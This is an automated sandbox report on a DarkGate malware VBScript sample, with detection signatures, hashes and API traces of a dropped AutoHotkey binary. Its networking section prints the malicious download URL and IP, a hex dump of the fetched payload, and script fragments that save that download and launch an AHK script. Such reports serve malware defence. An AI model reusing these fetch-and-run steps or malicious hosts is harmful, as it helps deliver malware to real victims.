Windows Analysis Report
ndvdikok.vbs

Overview

General Information

Sample name: ndvdikok.vbs
Analysis ID: 1427163
MD5: 32f61baa669991fb989439babaf493ff
SHA1: 4242d545077e3e643854e3148e00c8283533b9ab
SHA256: 75db6f949461cb03a155dd26c781a3c9e00edb917275f3b4d306b7094ed06a14
Tags: DarkGatevbs

Detection

DarkGate, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected DarkGate
Yara detected MailPassView
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionality to register a low level keyboard hook
Potential malicious VBS script found (has network functionality)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Keylogger Generic

Classification

Name: DarkGate
Description: First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate

AV Detection

Source: ndvdikok.vbs Virustotal: Detection: 15%
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00480DC0 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose, 1_2_00480DC0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045E220 _wcschr,_wcschr,GetFileAttributesW,FindFirstFileW,FindClose,CoInitialize,CoCreateInstance,CoUninitialize, 1_2_0045E220
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0047C320 FindFirstFileW,FindClose,GetFileAttributesW,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle, 1_2_0047C320
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044D570 FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,GetLastError,FindFirstFileW,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__swprintf,FindNextFileW,FindClose, 1_2_0044D570
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044D870 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime, 1_2_0044D870
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00437B70 FindFirstFileW,FindNextFileW,FindClose,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindClose, 1_2_00437B70
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044DBB0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0044DBB0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00480D30 FindFirstFileW,FindClose,GetFileAttributesW, 1_2_00480D30
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045EEA0 GetFullPathNameW,GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,_wcsrchr,_wcsrchr,_wcsncpy,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,FindNextFileW,FindClose, 1_2_0045EEA0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048495A1 FindFirstFileA,GetLastError, 1_2_048495A1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489C541 FindFirstFileW,FindNextFileW,FindClose, 1_2_0489C541
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0484655D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 1_2_0484655D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0489B145 FindFirstFileW,lstrcmpW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose, 1_2_0489B145
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04876FE5 FindFirstFileW,FindNextFileW,FindClose, 1_2_04876FE5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04873871 FindFirstFileW,FindNextFileW,FindClose, 1_2_04873871

Networking

Source: C:\Windows\System32\wscript.exe Network Connect: 205.234.201.153 80
Source: Initial file: stream.Write xmlhttp.ResponseBody
Source: Initial file: stream.SaveToFile zipFile, 2
Source: Joe Sandbox View ASN Name: SERVERCENTRALUS SERVERCENTRALUS
Source: global traffic HTTP traffic detected:
  GET /fykbmgsz HTTP/1.1
  Accept: */*
  Accept-Language: en-ch
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: backupssupport.com
  Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045DB90 __wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,InternetReadFileExA,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,DeleteFileW, 1_2_0045DB90
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: closeContent-Disposition: attachment; filename="fykbmgsz"Content-Type: application/octet-streamContent-Length: 795674Date: Wed, 17 Apr 2024 04:39:55 GMTData Raw: 50 4b 03 04 14 00 00 00 08 00 47 2f 90 58 5b 96 81 81 59 ef 04 00 62 8a 0e 00 08 00 00 00 74 65 73 74 2e 74 78 74 ec dd 57 82 dc 38 d2 36 ea 2d a5 37 97 69 f7 bf a4 ff 79 03 00 93 64 55 69 ba 5b fa 6e ce 11 67 5a 95 34 70 81 f0 08 04 ae 9b d7 f5 7e dd ec 37 75 1d f7 e7 c3 e9 75 3a 9c 77 87 ed e9 78 dc 9d 4e 87 cb e9 76 da 9d cf c7 eb e9 7c 7a 1d de a7 f7 f9 7a da 1f ee 87 dd f1 76 dc 1d ee be d9 1f 5d e7 db e9 78 be 1c 6e 7e 1e 0e c7 e3 e6 b0 3b 9c cf a7 f3 e5 f4 3e 5d 0e 8f f3 e1 f0 38 6e fd 7e 9d 77 c7 fd e9 7a be 1d 8e e7 cd 69 ef 8b 83 ef b6 fe d9 1e 8f a7 f3 f9 a6 d6 f3 49 0b 6a 79 7b 73 3b f8 52 5d 97 f3 f9 f0 54 ff eb bc 3f ec ce 1b ff 1e 4e 5b ad 9c 8f 97 e3 e9 f0 f6 46 dd a7 e7 e9 a8 c7 c7 d3 d6 3f bb e3 f6 7c 3d e6 7f db 73 be b8 2a 77 3e 6f 34 b2 d5 c6 e1 f0 3a ec 4e 8f d3 f1 b0 37 c2 a7 2f d3 a3 83 5f 19 d5 f6 b0 3f 3d b5 fc 36 a6 ab 77 e7 c3 f9 74 3b fa ce 38 33 d8 8b 3a ae fa e2 d6 7f 5e d6 97 27 6d 5c b5 bf 3b 5d 3d d3 83 f3 4e 6d 5b ed ee 4e 97 7c 0f 76 e0 73 78 6a 0b fc f4 f6 0d 26 7a a3 0f cf d3 e3 bc 37 f2 fd e1 71 7a 1f 4e a7 8b 96 b7 81 b6 fe 6e d4 7b 3c bd 34 b6 3f de 40 ed 7e 3a 1c ee 46 6b 16 8e 1b d0 bd 83 77 5a 3d 98 99 9d 91 f9 e1 e9 13 fc 2e 6a 07 22 b3 ba 35 19 ef c3 2d 6d 1a cc e6 f0 30 49 fb b3 06 f5 e0 60 66 77 a7 bb 9a 5f 7a 0e aa a7 cb 79 7f ba 99 9b bd 12 67 90 ba 64 56 40 52 1b d5 eb 93 39 7c 7b 72 3b 5c cf 7b 50 3d e8 6d 00 b3 3d 99 f5 63 5a d9 a9 65 7b 7a 80 d1 01 1c 55 a2 d7 b0 c2 28 dd 9b 85 73 da cd ec e8 d9 cd bb 07 18 1a 51 f5 e5 76 3a a9 67 0b ca d7 93 59 53 ea 06 03 9e c7 3d 58 04 1f 1f a0 70 32 73 77 f0 79 18 b7 59 02 6b 68 62 5c cf 63 46 73 04 ed 07 bc bd 9b b1 dd c9 d8 33 02 35 de c0 34 3d ba 1e f6 66 62 a3 67 70 1d b6 99 e3 60 a0 d9 3f fb ef 62 16 6f e6 ec ae ce bd d1 6b d4 17 17 6d 2a 
ea a9 1f ea 85 15 c1 06 94 f2 76 77 86 4b fa 95 b9 86 ab f0 c0 f8 bc 07 89 bd 12 57 7d cd dc 1c f5 ca 1d 38 1f 03 25 75 9a d8 d3 3d 7d 05 37 d0 33 96 bd 71 6f 8c e1 72 b8 a0 41 14 a5 b7 3e 52 5b cd d1 11 36 a4 9f 07 a3 82 5f 27 33 a9 ee 33 04 f0 df 43 af 6e 85 05 70 d7 9c 9d 82 6b 6a f3 ce ac 67 8a 36 46 7c d5 ca 3b 33 a4 b4 17 7a fd ce dc 86 32 43 51 60 fe 38 83 6e e6 52 cd d7 70 80 cc a6 de 18 97 f7 f7 c3 bd f8 c3 53 79 50 28 2a ce 9c 43 cb 20 94 3a 02 af e0 b0 ba 35 7c 41 51 ef 43 e8 f9 84 83 dc 71 12 f8 a2 b6 bb 96 15 68 b3 ab 5e a3 3a df 42 05 30 69 03 33 e0 77 b8 0d 6a 3c 99 cf 8b 52 af d4 8f 56 3c 29 1e 84 9a 60 56 6a 7e 80 85 fe ab f5 04 ef 40 0c ec ef 50 01 a6 64 9e b5 b5 87 75 a1 42 68 17 2c 30 b2 d0 0a 8a 0a f4 c0 1a ef f0 dd de 2c bc 60 4c 66 d8 4c 64 ca 81 2d df 81 b7 6f 2f b0 0c a0 e1 fb 49 79 9c 06 3e 6d 8a 77 e9 ab 59 0b be bc c1 2b 13 bb 33 af 46 a9 c5 5b 28 0b a6 ee 7c a1 f6 1a 5f 28 46 33 b0 cd 07 fe 87 bf 99 11 dc cc 13 d8 a9 e4 0e dc 0e fe 85 73 6a 3d e8 a1 5a 8f ba e9 ab 83 36 f0 9a f0 02 fc 29 bc
Source: unknown DNS traffic detected: queries for: backupssupport.com
Source: wscript.exe, 00000000.00000002.1660300685.000001D5A3ECA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658115436.000001D5A5B32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658042445.000001D5A3C9E000.00000004.00000020.00020000.00000000.sdmp, ndvdikok.vbs String found in binary or memory: http://backupssupport.com/fykbmgsz
Source: wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://backupssupport.com/fykbmgsz6
Source: wscript.exe, 00000000.00000003.1656750950.000001D5A3C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1659182934.000001D5A3C9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658042445.000001D5A3C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://backupssupport.com/fykbmgszj
Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.dr String found in binary or memory: https://autohotkey.com
Source: AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.dr String found in binary or memory: https://autohotkey.comCould
Source: wscript.exe, 00000000.00000002.1660535194.000001D5A5EE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0040E820 SetWindowsHookExW 0000000D,Function_00009EA0,00400000,00000000 1_2_0040E820
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00405430 GetTickCount,IsClipboardFormatAvailable,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard, 1_2_00405430
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00405160 EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalUnlock,GlobalUnlock,GlobalFree,GlobalUnlock,CloseClipboard,SetClipboardData,GlobalUnlock,CloseClipboard, 1_2_00405160
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00483160 EmptyClipboard,GlobalUnlock,CloseClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,GlobalFree,GlobalUnlock,CloseClipboard, 1_2_00483160
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00405330 GetClipboardFormatNameW,__wcsnicmp,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,GetClipboardData, 1_2_00405330
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004442E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_wcsrchr,__wcsicoll,__wcsicoll,__wcsicoll,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,__wcsnicmp,__fassign,__wcsnicmp,_wcsncpy,__fassign,__fassign,__fassign,__fassign,GetDC,DestroyIcon,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,_free,_free,_free, 1_2_004442E0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00416010 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount, 1_2_00416010
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004014E4 GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,KillTimer,DragQueryFileW,DragFinish,GetTickCount,DragFinish,DragFinish,_wcsncpy,_wcsncpy,GetTickCount,_wcsncpy,GetTickCount,IsDialogMessageW,SetCurrentDirectoryW,TranslateAcceleratorW,TranslateMessage,DispatchMessageW, 1_2_004014E4
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00418140 GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetKeyState, 1_2_00418140
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00414870 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetKeyboardLayout,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId, 1_2_00414870
Source: Yara match File source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0487357D CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject, 1_2_0487357D

System Summary

Source: C:\NwiQ\AutoHotkey.exe Window found: window name: AutoHotkey
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04895009 Sleep,TerminateThread,NtClose,NtClose, 1_2_04895009
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04894C89 NtDuplicateObject,NtClose, 1_2_04894C89
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04894CBD NtQueryObject,NtQueryObject, 1_2_04894CBD
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04894D15 NtOpenProcess, 1_2_04894D15
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04894D65 NtQuerySystemInformation,NtDuplicateObject,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose, 1_2_04894D65
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A8DD GetCurrentProcessId,OpenProcess,InitializeProcThreadAttributeList,GetProcessHeap,RtlAllocateHeap,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 1_2_0486A8DD
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486ABFD GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 1_2_0486ABFD
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00449B70: __swprintf,CreateFileW,DeviceIoControl,CloseHandle, 1_2_00449B70
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045F410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_0045F410
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004014E4 1_2_004014E4
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004517E0 1_2_004517E0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004260F0 1_2_004260F0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0042A3C0 1_2_0042A3C0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0040D3F0 1_2_0040D3F0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A23BC 1_2_004A23BC
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A654C 1_2_004A654C
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00411570 1_2_00411570
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0048E630 1_2_0048E630
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0040D6C0 1_2_0040D6C0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A1865 1_2_004A1865
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00414870 1_2_00414870
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0041F800 1_2_0041F800
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00429800 1_2_00429800
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0047F800 1_2_0047F800
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00443AD0 1_2_00443AD0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A6A9D 1_2_004A6A9D
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00423B30 1_2_00423B30
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00438B30 1_2_00438B30
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A7BE9 1_2_004A7BE9
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00411BB0 1_2_00411BB0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0049CBB8 1_2_0049CBB8
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_004A9CDE 1_2_004A9CDE
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00419E61 1_2_00419E61
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00412E60 1_2_00412E60
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00419E60 1_2_00419E60
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00401EF4 1_2_00401EF4
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0043BFE0 1_2_0043BFE0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0486A0F5 1_2_0486A0F5
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0488E009 1_2_0488E009
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04866251 1_2_04866251
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0488CA21 1_2_0488CA21
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_04881A51 1_2_04881A51
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_048AD826 1_2_048AD826
Source: Joe Sandbox View Dropped File: C:\NwiQ\AutoHotkey.exe 897B0D0E64CF87AC7086241C86F757F3C94D6826F949A1F0FEC9C40892C0CECB
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 04875E39 appears 33 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 00480050 appears 42 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 04845251 appears 76 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0043A140 appears 78 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 00409044 appears 36 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0047FFB0 appears 67 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0049A3AA appears 60 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0484520D appears 34 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 048454ED appears 97 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0049A90E appears 35 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 04844F7D appears 101 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 0043A420 appears 283 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 00499C29 appears 342 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 04847581 appears 77 times
Source: C:\NwiQ\AutoHotkey.exe Code function: String function: 004A7DD0 appears 51 times
Source: ndvdikok.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@3/7@1/1
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0043B100 GetFileAttributesW,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,_memset,__swprintf,CreateProcessW,CloseHandle,CloseHandle,GetLastError,_memset,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW, 1_2_0043B100
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00449810 _wcsncpy,GetDiskFreeSpaceExW, 1_2_00449810
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0045F620 CreateToolhelp32Snapshot,Process32FirstW,__wcstoi64,Process32NextW,__wsplitpath,__wcsicoll,Process32NextW,CloseHandle,CloseHandle,CloseHandle, 1_2_0045F620
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_00481EC0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,ExtractIconW, 1_2_00481EC0
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fykbmgsz[1]
Source: C:\NwiQ\AutoHotkey.exe File created: C:\temp\
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ndvdikok.vbs"
Source: C:\NwiQ\AutoHotkey.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe Process created: C:\NwiQ\AutoHotkey.exe "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
